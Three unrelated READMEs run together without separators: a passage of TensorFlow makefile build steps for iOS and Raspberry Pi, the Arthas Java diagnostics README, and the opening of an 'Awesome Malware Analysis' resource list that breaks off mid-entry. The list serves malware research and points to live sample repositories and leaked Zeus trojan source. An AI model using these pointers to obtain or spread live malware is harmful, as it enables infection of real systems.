tensorflow/contrib/makefile/build_all_ios.sh ``` This process will take around twenty minutes on a modern MacBook Pro. When it completes, you will have a unified library for all architectures (i386sim, x86_64sim, armv7, armv7s and arm64) and the benchmark program. Although successfully compiling the benchmark program is a sign of success, the program is not a complete iOS app. If you would only like to build only one architecture to save time: (iOS 11+ only supports 64bit so you can get away with arm64) ```bash tensorflow/contrib/makefile/build_all_ios.sh -a arm64 ``` After the first build if you would like to just build the tensorflow library you can pass the -T flag to avoid a clean & rebuild. This should take you just a few seconds to generate the library if you modified one file. ```bash tensorflow/contrib/makefile/build_all_ios.sh -a arm64 -T ``` To see TensorFlow running on iOS, the example Xcode project in [tensorflow/examples/ios](../../examples/ios/) shows how to use the static library in a simple app. ### Building by hand This section covers each step of building. For all the code in one place, see [build_all_ios.sh](build_all_ios.sh). If you have not already, you will need to download dependencies: ```bash tensorflow/contrib/makefile/download_dependencies.sh ``` Next, you will need to compile protobufs for iOS (optionally takes the -a $ARCH flag): ```bash tensorflow/contrib/makefile/compile_ios_protobuf.sh ``` Then, you will need to compile the nsync library for iOS (optionally takes -a $ARCH flag): ```bash export HOST_NSYNC_LIB=`tensorflow/contrib/makefile/compile_nsync.sh` export TARGET_NSYNC_LIB=`tensorflow/contrib/makefile/compile_nsync.sh -t ios` ``` Then, you can run the makefile specifying iOS as the target, along with the architecture you want to build for: ```bash make -f tensorflow/contrib/makefile/Makefile \ TARGET=IOS \ IOS_ARCH=ARM64 ``` This creates a library in `tensorflow/contrib/makefile/gen/lib/libtensorflow-core.a` that you can link any xcode project against. To see TensorFlow running on iOS, the example Xcode project in [tensorflow/examples/ios](../../examples/ios/) shows how to use the static library in a simple app. #### Universal binaries In some situations, you will need a universal library. In that case, you will still need to run `compile_ios_protobuf.sh` and `compile_nsync.sh`, but this time follow it with: ```bash compile_ios_tensorflow.sh ``` `compile_ios_tensorflow.sh` takes the -a flag to build only for one architecture. In case you run into issues with unresolved symbols with nsync you can also pass -h ${HOST_NSYNC_LIB} and -n {TARGET_NSYNC_LIB} so it would look like: ```bash tensorflow/contrib/makefile/compile_ios_tensorflow.sh -f "-O3" -h tensorflow/contrib/makefile/downloads/nsync/builds/default.macos.c++11/nsync.a -n tensorflow/contrib/makefile/downloads/nsync/builds/lipo.ios.c++11/nsync.a -a arm64 ``` In XCode, you will need to use -force_load in the linker flags section of the build settings to pull in the global constructors that are used to register ops and kernels. #### Optimization The `compile_ios_tensorflow.sh` script can take optional command-line arguments. The first argument will be passed as a C++ optimization flag and defaults to debug mode. If you are concerned about performance or are working on a release build, you would likely want a higher optimization setting, like so: ```bash compile_ios_tensorflow.sh -f "-Os" ``` For other variations of valid optimization flags, see [clang optimization levels](http://stackoverflow.com/questions/15548023/clang-optimization-levels). ## Raspberry Pi Building on the Raspberry Pi is similar to a normal Linux system. First download the dependencies, install the required packages and build protobuf: ```bash tensorflow/contrib/makefile/download_dependencies.sh sudo apt-get install -y autoconf automake libtool gcc-4.8 g++-4.8 cd tensorflow/contrib/makefile/downloads/protobuf/ ./autogen.sh ./configure make sudo make install sudo ldconfig # refresh shared library cache cd ../../../../.. export HOST_NSYNC_LIB=`tensorflow/contrib/makefile/compile_nsync.sh` export TARGET_NSYNC_LIB="$HOST_NSYNC_LIB" ``` Once that's done, you can use make to build the library and example: ```bash make -f tensorflow/contrib/makefile/Makefile HOST_OS=PI TARGET=PI OPTFLAGS="-Os" CXX=g++-4.8 ``` If you're only interested in building for Raspberry Pi's 2 and 3, you can supply some extra optimization flags to give you code that will run faster: ```bash make -f tensorflow/contrib/makefile/Makefile HOST_OS=PI TARGET=PI \ OPTFLAGS="-Os -mfpu=neon-vfpv4 -funsafe-math-optimizations -ftree-vectorize" CXX=g++-4.8 ``` One thing to be careful of is that the gcc version 4.9 currently installed on Jessie by default will hit an error mentioning `__atomic_compare_exchange`. This is why the examples above specify `CXX=g++-4.8` explicitly, and why we install it using apt-get. If you have partially built using the default gcc 4.9, hit the error and switch to 4.8, you need to do a `make -f tensorflow/contrib/makefile/Makefile clean` before you build. If you don't, the build will appear to succeed but you'll encounter [malloc(): memory corruption errors](https://github.com/tensorflow/tensorflow/issues/3442) when you try to run any programs using the library. For more examples, look at the tensorflow/contrib/pi_examples folder in the source tree, which contains code samples aimed at the Raspberry Pi. # Other notes ## Supported Systems The Make script has been tested on Ubuntu and OS X. If you look in the Makefile itself, you'll see it's broken up into host and target sections. If you are cross-compiling, you should look at customizing the target settings to match what you need for your desired system. ## Dependency Management The Makefile loads in a list of dependencies stored in text files. These files are generated from the main Bazel build by running `tensorflow/contrib/makefile/gen_file_lists.sh`. You'll need to re-run this i you make changes to the files that are included in the build. Header dependencies are not automatically tracked by the Makefile, so if you make header changes you will need to run this command to recompile cleanly: ```bash make -f tensorflow/contrib/makefile/Makefile clean ``` ### Cleaning up In some situations, you may want to completely clean up. The dependencies, intermediate stages, and generated files are stored in: ```bash tensorflow/contrib/makefile/downloads tensorflow/contrib/makefile/gen ``` Those directories can safely be removed, but you will have to start over with `download_dependencies.sh` once you delete them. ### Fixing Makefile Issues Because the main development of TensorFlow is done using Bazel, changes to the codebase can sometimes break the makefile build process. If you find that tests relying on this makefile are failing with a change you're involved in, here are some trouble-shooting steps: - Try to reproduce the issue on your platform. If you're on Linux, running `make -f tensorflow/contrib/makefile/Makefile` should be enough to recreate most issues. For other platforms, see the sections earlier in this document. - The most common cause of breakages are files that have been added to the Bazel build scripts, but that the makefile isn't aware of. Typical symptoms of this include linker errors mentioning missing symbols or protobuf headers that aren't found. To address these problems, take a look at the *.txt files in `tensorflow/contrib/makefile`. If you have a new operator, you may need to add it to `tf_op_files.txt`, or for a new proto to `tf_proto_files.txt`. - There's also a wildcard system in `Makefile` that defines what core C++ files are included in the library. This is designed to match the equivalent rule in `tensorflow/core/BUILD`, so if you change the wildcards there to include new files you'll need to also update `CORE_CC_ALL_SRCS` and `CORE_CC_EXCLUDE_SRCS` in the makefile. - Some of the supported platforms use clang instead of gcc as their compiler, so if you're hitting compile errors you may need to tweak your code to be more friendly to different compilers by avoiding gcc extensions or idioms. These are the most common reasons for makefile breakages, but it's also possible you may hit something unusual, like a platform incompatibility. For those, you'll need to see if you can reproduce the issue on that particular platform and debug it there. You can also reach out to the broader TensorFlow team by [filing a Github issue](https://github.com/tensorflow/tensorflow/issues) to ask for help.
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) ![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg) ![license](https://img.shields.io/github/license/alibaba/arthas.svg) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue") [![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open") `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas help developers in trouble-shooting production issues for Java applications without modifying code or restarting servers. [ไธญๆ–‡่ฏดๆ˜Ž/Chinese Documentation](README_CN.md) ### Background Often times, the production system network is inaccessible from local development environment. If issues are encountered in production systems, it is impossible to use IDE to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, which leads to blocking of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help trouble-shoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can trouble-shoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded? Or where the class is loaded from? (Useful for trouble-shooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. * Supports JDK 6+ * Supports Linux/Mac/Windows ### Quick start #### Use `arthas-boot`(Recommend) Download`arthas-boot.jar`๏ผŒStart with `java` command: ```bash wget https://alibaba.github.io/arthas/arthas-boot.jar java -jar arthas-boot.jar ``` Print usage: ```bash java -jar arthas-boot.jar -h ``` #### Use `as.sh` You can install Arthas with one single line command on Linux, Unix, and Mac. Pls. copy the following command and paste it into the command line, then press *Enter* to run: ```bash curl -L https://alibaba.github.io/arthas/install.sh | sh ``` The command above will download the bootstrap script `as.sh` to the current directory. You can move it the any other place you want, or put its location in `$PATH`. You can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information. ### Documentation * [User manual](https://alibaba.github.io/arthas/en) * [Installation](https://alibaba.github.io/arthas/en/install-detail.html) * [Quick start](https://alibaba.github.io/arthas/en/quick-start.html) * [Advanced usage](https://alibaba.github.io/arthas/en/advanced-use.html) * [Commands](https://alibaba.github.io/arthas/en/commands.html) * [Docker](https://alibaba.github.io/arthas/en/docker.html) * [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case) * [Questions and answers](https://github.com/alibaba/arthas/issues?utf8=%E2%9C%93&q=label%3Aquestion-answered+) * [How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) * [Release Notes](https://alibaba.github.io/arthas/en/release-notes.html) ### Feature Showcase #### Dashboard * https://alibaba.github.io/arthas/en/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread See what is eating your cpu (ranked by top cpu usage) and what is going on there in one glance: ``` $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### sc Search any loaded class with detailed information. ``` $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### stack View the call stack of `test.arthas.TestStack#doGet`: ``` $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ``` $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor Monitor a specific method invocation statistics, including total number of invocations, average response time, success rate, every 5 seconds: ``` $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) Record method invocation data, so that you can check the method invocation parameters, returned value and thrown exception later. It works as if you could come back and replay the past method invocation via time tunnel. ``` $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader ``` $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://alibaba.github.io/arthas/en/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) ### Known Users Welcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration) ![Alibaba](static/alibaba.png) ![Alipay](static/alipay.png) ![Aliyun](static/aliyun.png) ![Taobao](static/taobao.png) ![Tmall](static/tmall.png) ![ๅพฎๅŒป](static/weiyi.png) ![ๅ“่ถŠๆ•™่‚ฒ](static/zhuoyuejiaoyu.png) ![็‹็‹ธ้‡‘ๆœ](static/hulijingfu.png) ![ไธ‰ไฝ“ไบ‘](static/santiyun.png) ![่ฏๅคงๆ–‡ๅŒ–](static/zhengdawenhua.png) ![Acmedcare+](static/acmedcare.png) ![ๅฅฝๆ…ท](static/homeking365_log.png) ![ๆฅ็”ต็ง‘ๆŠ€](static/laidian.png) ![ๅ››ๆ ผไบ’่”](static/sigehulian.png) ![ICBC](static/icbc.png) ![้™†้นฐ](static/luying.png) ![็Žฉๅ‹ๆ—ถไปฃ](static/wangyoushidai.png) ![ๅฅน็คพๅŒบ](static/tashequ.png) ![้พ™่…พๅ‡บ่กŒ](static/longtengchuxing.png) ![foscam](static/foscam.png) ![ไบŒ็ปด็ซ](static/2dfire.png) ![lanxum](static/lanxum_com.png) ![็บณ้‡Œๅฅๅบท](static/ngarihealth.png) ![ๆŽŒ้—จ1ๅฏน1](static/zhangmen.png) ![offcn](static/offcn.png) ![sia](static/sia.png) ![ๆŒฏๅฎ‰่ต„ไบง](static/zhenganzichang.png) ![่ ่](static/bolo.png) ![ไธญ้€šๅฟซ้€’](static/zto.png) ![ๅ…‰็‚น็ง‘ๆŠ€](static/guangdian.png) ### Credit #### Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/alibaba/arthas/graphs/contributors"><img src="https://opencollective.com/arthas/contributors.svg?width=890&button=false" /></a> #### Projects * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/termd/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/eclipse-vertx/vert.x/tree/master/src/main/java/io/vertx/core/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x
# Awesome Malware Analysis [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of awesome malware analysis tools and resources. Inspired by [awesome-python](https://github.com/vinta/awesome-python) and [awesome-php](https://github.com/ziadoz/awesome-php). [![Drop ICE](drop.png)](https://twitter.com/githubbers/status/1182017616740663296) - [Malware Collection](#malware-collection) - [Anonymizers](#anonymizers) - [Honeypots](#honeypots) - [Malware Corpora](#malware-corpora) - [Open Source Threat Intelligence](#open-source-threat-intelligence) - [Tools](#tools) - [Other Resources](#other-resources) - [Detection and Classification](#detection-and-classification) - [Online Scanners and Sandboxes](#online-scanners-and-sandboxes) - [Domain Analysis](#domain-analysis) - [Browser Malware](#browser-malware) - [Documents and Shellcode](#documents-and-shellcode) - [File Carving](#file-carving) - [Deobfuscation](#deobfuscation) - [Debugging and Reverse Engineering](#debugging-and-reverse-engineering) - [Network](#network) - [Memory Forensics](#memory-forensics) - [Windows Artifacts](#windows-artifacts) - [Storage and Workflow](#storage-and-workflow) - [Miscellaneous](#miscellaneous) - [Resources](#resources) - [Books](#books) - [Other](#other) - [Related Awesome Lists](#related-awesome-lists) - [Contributing](#contributing) - [Thanks](#thanks) View Chinese translation: [ๆถๆ„่ฝฏไปถๅˆ†ๆžๅคงๅˆ้›†.md](ๆถๆ„่ฝฏไปถๅˆ†ๆžๅคงๅˆ้›†.md). --- ## Malware Collection ### Anonymizers *Web traffic anonymizers for analysts.* * [Anonymouse.org](http://anonymouse.org/) - A free, web based anonymizer. * [OpenVPN](https://openvpn.net/) - VPN software and hosting solutions. * [Privoxy](http://www.privoxy.org/) - An open source proxy server with some privacy features. * [Tor](https://www.torproject.org/) - The Onion Router, for browsing the web without leaving traces of the client IP. ### Honeypots *Trap and collect your own samples.* * [Conpot](https://github.com/mushorg/conpot) - ICS/SCADA honeypot. * [Cowrie](https://github.com/micheloosterhof/cowrie) - SSH honeypot, based on Kippo. * [DemoHunter](https://github.com/RevengeComing/DemonHunter) - Low interaction Distributed Honeypots. * [Dionaea](https://github.com/DinoTools/dionaea) - Honeypot designed to trap malware. * [Glastopf](https://github.com/mushorg/glastopf) - Web application honeypot. * [Honeyd](http://www.honeyd.org/) - Create a virtual honeynet. * [HoneyDrive](http://bruteforcelab.com/honeydrive) - Honeypot bundle Linux distro. * [Honeytrap](https://github.com/honeytrap/honeytrap) - Opensource system for running, monitoring and managing honeypots. * [MHN](https://github.com/pwnlandia/mhn) - MHN is a centralized server for management and data collection of honeypots. MHN allows you to deploy sensors quickly and to collect data immediately, viewable from a neat web interface. * [Mnemosyne](https://github.com/johnnykv/mnemosyne) - A normalizer for honeypot data; supports Dionaea. * [Thug](https://github.com/buffer/thug) - Low interaction honeyclient, for investigating malicious websites. ### Malware Corpora *Malware samples collected for analysis.* * [Clean MX](http://support.clean-mx.de/clean-mx/viruses.php) - Realtime database of malware and malicious domains. * [Contagio](http://contagiodump.blogspot.com/) - A collection of recent malware samples and analyses. * [Exploit Database](https://www.exploit-db.com/) - Exploit and shellcode samples. * [Infosec - CERT-PA](https://infosec.cert-pa.it/analyze/submission.html) - Malware samples collection and analysis. * [InQuest Labs](https://labs.inquest.net) - Evergrowing searchable corpus of malicious Microsoft documents. * [Javascript Mallware Collection](https://github.com/HynekPetrak/javascript-malware-collection) - Collection of almost 40.000 javascript malware samples * [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/) - A resource providing rapid identification and actionable context for malware investigations. * [Malshare](https://malshare.com) - Large repository of malware actively scrapped from malicious sites. * [Open Malware Project](http://openmalware.org/) - Sample information and downloads. Formerly Offensive Computing. * [Ragpicker](https://github.com/robbyFux/Ragpicker) - Plugin based malware crawler with pre-analysis and reporting functionalities * [theZoo](https://github.com/ytisf/theZoo) - Live malware samples for analysts. * [Tracker h3x](http://tracker.h3x.eu/) - Agregator for malware corpus tracker and malicious download sites. * [vduddu malware repo](https://github.com/vduddu/Malware) - Collection of various malware files and source code. * [VirusBay](https://beta.virusbay.io/) - Community-Based malware repository and social network. * [ViruSign](http://www.virussign.com/) - Malware database that detected by many anti malware programs except ClamAV. * [VirusShare](https://virusshare.com/) - Malware repository, registration required. * [VX Vault](http://vxvault.net) - Active collection of malware samples. * [Zeltser's Sources](https://zeltser.com/malware-sample-sources/) - A list of malware sample sources put together by Lenny Zeltser. * [Zeus Source Code](https://github.com/Visgean/Zeus) - Source for the Zeus trojan leaked in 2011. * [VX Underground](http://vx-underground.org/) - Massive and growing collection of free malware samples. ## Open Source Threat Intelligence ### Tools *Harvest and analyze IOCs.* * [AbuseHelper](https://github.com/abusesa/abusehelper) - An open-source framework for receiving and redistributing abuse feeds and threat intel. * [AlienVault Open Threat Exchange](https://otx.alienvault.com/) - Share and collaborate in developing Threat Intelligence. * [Combine](https://github.com/mlsecproject/combine) - Tool to gather Threat Intelligence indicators from publicly available sources. * [Fileintel](https://github.com/keithjjones/fileintel) - Pull intelligence per file hash. * [Hostintel](https://github.com/keithjjones/hostintel) - Pull intelligence per host. * [IntelMQ](https://www.enisa.europa.eu/topics/csirt-cert-services/community-projects/incident-handling-automation) - A tool for CERTs for processing incident data using a message queue. * [IOC Editor](https://www.fireeye.com/services/freeware/ioc-editor.html) - A free editor for XML IOC files. * [iocextract](https://github.com/InQuest/python-iocextract) - Advanced Indicator of Compromise (IOC) extractor, Python library and command-line tool. * [ioc_writer](https://github.com/mandiant/ioc_writer) - Python library for working with OpenIOC objects, from Mandiant. * [MalPipe](https://github.com/silascutler/MalPipe) - Malware/IOC ingestion and processing engine, that enriches collected data. * [Massive Octo Spice](https://github.com/csirtgadgets/massive-octo-spice) - Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the [CSIRT Gadgets Foundation](http://csirtgadgets.org/collective-intelligence-framework). * [MISP](https://github.com/MISP/MISP) - Malware Information Sharing Platform curated by [The MISP Project](http://www.misp-project.org/). * [Pulsedive](https://pulsedive.com) - Free, community-driven threat intelligence platform collecting IOCs from open-source feeds. * [PyIOCe](https://github.com/pidydx/PyIOCe) - A Python OpenIOC editor. * [RiskIQ](https://community.riskiq.com/) - Research, connect, tag and share IPs and domains. (Was PassiveTotal.) * [threataggregator](https://github.com/jpsenior/threataggregator) - Aggregates security threats from a number of sources, including some of those listed below in [other resources](#other-resources). * [ThreatConnect](https://threatconnect.com/free/) - TC Open allows you to see and share open source threat data, with support and validation from our free community. * [ThreatCrowd](https://www.threatcrowd.org/) - A search engine for threats, with graphical visualization. * [ThreatIngestor](https://github.com/InQuest/ThreatIngestor/) - Build automated threat intel pipelines sourcing from Twitter, RSS, GitHub, and more. * [ThreatTracker](https://github.com/michael-yip/ThreatTracker) - A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines. * [TIQ-test](https://github.com/mlsecproject/tiq-test) - Data visualization and statistical analysis of Threat Intelligence feeds. ### Other Resources *Threat intelligence and IOC resources.* * [Autoshun](https://www.autoshun.org/) ([list](https://www.autoshun.org/files/shunlist.csv)) - Snort plugin and blocklist. * [Bambenek Consulting Feeds](http://osint.bambenekconsulting.com/feeds/) - OSINT feeds based on malicious DGA algorithms. * [Fidelis Barncat](https://www.fidelissecurity.com/resources/fidelis-barncat) - Extensive malware config database (must request access). * [CI Army](http://cinsscore.com/) ([list](http://cinsscore.com/list/ci-badguys.txt)) - Network security blocklists. * [Critical Stack- Free Intel Market](https://intel.criticalstack.com) - Free intel aggregator with deduplication featuring 90+ feeds and over 1.2M indicators. * [Cybercrime tracker](http://cybercrime-tracker.net/) - Multiple botnet active tracker. * [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise shared publicly by FireEye. * [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists with a focus on attacks, malware and abuse. Evolution, Changes History, Country Maps, Age of IPs listed, Retention Policy, Overlaps. * [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation. * [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol. * [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service. * [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources. * [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter. * [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and searchable incident database, with a web [API](https://dshield.org/api/). ([unofficial Python library](https://github.com/rshipp/python-dshield)). * [malc0de](http://malc0de.com/database/) - Searchable incident database. * [Malware Domain List](http://www.malwaredomainlist.com/) - Search and share malicious URLs. * [MetaDefender Threat Intelligence Feed](https://www.opswat.com/developers/threat-intelligence-feed) - 